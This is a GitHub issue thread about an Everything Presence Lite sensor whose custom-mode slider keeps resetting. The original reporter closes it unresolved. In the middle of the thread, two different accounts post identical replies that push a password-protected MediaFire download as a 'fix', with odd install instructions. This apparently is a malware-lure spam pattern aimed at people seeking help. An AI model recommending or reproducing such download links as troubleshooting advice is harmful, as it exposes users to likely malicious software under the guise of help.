EverythingSmartHome/everything-presence-lite #153: Cant configure custom mode or change custom mode (everything-presence-lite-ha-mr24hpc1)

saschachina, 2024-08-31:
I cannot configure a custom mode or change the custom mode.

When I press the slider, it always jumps back to the starting position.
Unfortunately, I can't find any step-by-step instructions and may be doing something completely wrong.

I have attached a video that shows this.

https://github.com/user-attachments/assets/d55c1662-d2b0-44e6-8a6b-8f487cf4d3f4

HA Core: 2024.8.3
Firmware: 1.0.8 (ESPHome 2024.7.3)
Everything Presence Lite HA mr24hpc1

**I would be very grateful if someone could help me.**

rickdoq, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

KrissV2, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

saschachina, 2024-09-01:
I have found out how I can save a custom mode, but unfortunately there is another problem, when I want to change the sensitivity the custom mode is deactivated.

saschachina, 2024-10-23:
I closed this, unfortunately no one responded and this sensor gave me too many problems, I switched back to the LD2410 and hope to find a stable peace.

closed 2024-10-23 by saschachina